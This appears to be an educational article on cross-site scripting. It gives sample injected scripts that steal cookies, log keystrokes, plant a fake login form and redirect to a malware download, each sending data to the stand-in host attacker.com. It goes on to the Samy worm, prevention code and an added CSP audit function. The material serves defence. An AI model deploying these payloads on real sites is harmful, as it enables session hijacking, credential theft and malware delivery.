
Malicious JavaScript examples

A malicious script injected via Cross-Site Scripting (XSS) can perform a variety of harmful actions. Here are examples of common malicious scripts and the potential consequences:

1. Session Hijacking

An attacker can steal session cookies, allowing them to impersonate a user. Here's an example script that sends the user's cookies to the attacker's server:

<script>
    var img = new Image();
    img.src = "http://attacker.com/steal?cookie=" + document.cookie;
</script>

Potential Consequences:

2. Keylogging

An attacker can log the keystrokes of the user, capturing sensitive information like passwords and credit card numbers.

<script>
    document.onkeypress = function(e) {
        var xhr = new XMLHttpRequest();
        xhr.open("GET", "http://attacker.com/log?key=" + e.key, true);
        xhr.send();
    };
</script>

Potential Consequences:

3. Phishing

An attacker can create fake login forms to trick users into entering their credentials.

<script>
    document.body.innerHTML = '<form action="http://attacker.com/login" method="POST">\
        <input type="text" name="username" placeholder="Username">\
        <input type="password" name="password" placeholder="Password">\
        <input type="submit" value="Login">\
    </form>';
</script>

Potential Consequences:

4. Defacement

An attacker can modify the content of the webpage, damaging the reputation of the website.

<script>
    document.body.innerHTML = '<h1>Hacked by Attacker</h1>';
</script>

Potential Consequences:

5. Distribution of Malware

An attacker can use XSS to inject a script that downloads and executes malware on the user's machine.

<script>
    window.location.href = "http://attacker.com/malware.exe";
</script>

Potential Consequences:

Real-World Example

A real-world example of an XSS attack is the one that occurred on the MySpace social network in 2005, known as the Samy worm. The attacker, Samy Kamkar, exploited an XSS vulnerability to create a worm that spread rapidly by posting a self-replicating script to user profiles. When another user viewed an infected profile, the script would execute and post itself to the victim's profile as well. This led to over one million MySpace profiles being infected in a short period of time.

Prevention Measures

  1. Output Encoding: Encode data before displaying it in the browser to ensure it is treated as text rather than executable code.

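    // Untrusted value: everything after "#" in the page URL.
    var search = location.hash.substring(1);

    // Escape the characters that are significant in HTML text and quoted attribute values.
    function encodeHTML(str) {
        return str.replace(/&/g, '&amp;')
                  .replace(/</g, '&lt;')
                  .replace(/>/g, '&gt;')
                  .replace(/"/g, '&quot;')
                  .replace(/'/g, '&#39;');
    }
    document.getElementById("results").innerHTML = "Search results for: " + encodeHTML(search);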
    
  2. Input Validation and Sanitization: Validate and sanitize user inputs to ensure they do not contain malicious code.

    // Allow-list: drop every character that is not a letter, a digit or a space.
    function sanitizeInput(input) {
        return input.replace(/[^a-zA-Z0-9 ]/g, "");
    }
    var search = sanitizeInput(location.hash.substring(1));
    
  3. Content Security Policy (CSP): Implement CSP to restrict the sources from which scripts can be executed.

    Content-Security-Policy: default-src 'self'; script-src 'self';
    
  4. Use Secure JavaScript Methods: Use methods like textContent or createTextNode to avoid interpreting the input as HTML.

    var search = location.hash.substring(1);
    var textNode = document.createTextNode("Search results for: " + search);
    document.getElementById("results").appendChild(textNode);
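
The following is an added example, not code from the original article: a simplified model of CSP matching that checks which of the actions in the snippets above the policy from item 3 restricts. The function names and the `https://shop.example` origin are assumptions. It shows that `form-action` does not inherit from `default-src`, so the policy needs an explicit `form-action 'self'` to restrict where forms can post.

```javascript
// Added example. Simplified CSP model: only 'self', '*', 'none' and
// scheme://host sources are understood; paths, ports and wildcards are not.
// Fetch directives fall back to default-src; form-action does not.
const FALLS_BACK = new Set(["script-src", "img-src", "connect-src"]);

function parseCsp(header) {
  const policy = new Map();
  for (const part of header.split(";")) {
    const [name, ...sources] = part.trim().toLowerCase().split(/\s+/);
    // The first occurrence of a directive wins; later duplicates are ignored.
    if (name && !policy.has(name)) policy.set(name, sources);
  }
  return policy;
}

// Source list governing a directive, or null when nothing restricts it.
function effectiveSources(policy, directive) {
  if (policy.has(directive)) return policy.get(directive);
  if (FALLS_BACK.has(directive) && policy.has("default-src")) return policy.get("default-src");
  return null;
}

function allowsUrl(policy, directive, url, pageOrigin) {
  const sources = effectiveSources(policy, directive);
  if (sources === null) return true;
  const self = new URL(pageOrigin).origin;
  const target = new URL(url, pageOrigin).origin;
  return sources.some((s) => s === "*" || (s === "'self'" && target === self) ||
    (/^https?:\/\//.test(s) && new URL(s).origin === target));
}

// An injected inline <script> has no nonce, so it runs only when script-src is
// unrestricted or lists 'unsafe-inline' without a nonce or hash source.
function allowsInjectedInlineScript(policy) {
  const sources = effectiveSources(policy, "script-src");
  if (sources === null) return true;
  const strict = sources.some((s) => /^'(nonce|sha(256|384|512))-/.test(s));
  return sources.includes("'unsafe-inline'") && !strict;
}

// attacker.com is the placeholder host used in the article's snippets.
function audit(header, pageOrigin) {
  const p = parseCsp(header);
  return {
    inlineScript: allowsInjectedInlineScript(p),
    imageBeacon: allowsUrl(p, "img-src", "http://attacker.com/steal", pageOrigin),
    xhrBeacon: allowsUrl(p, "connect-src", "http://attacker.com/log", pageOrigin),
    formPost: allowsUrl(p, "form-action", "http://attacker.com/login", pageOrigin),
  };
}
```

Calling `audit("default-src 'self'; script-src 'self';", "https://shop.example")` reports every action as blocked except `formPost`; appending `form-action 'self';` to the header closes that one as well.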
    
Published on: Jun 17, 2024, 06:11 AM  
 
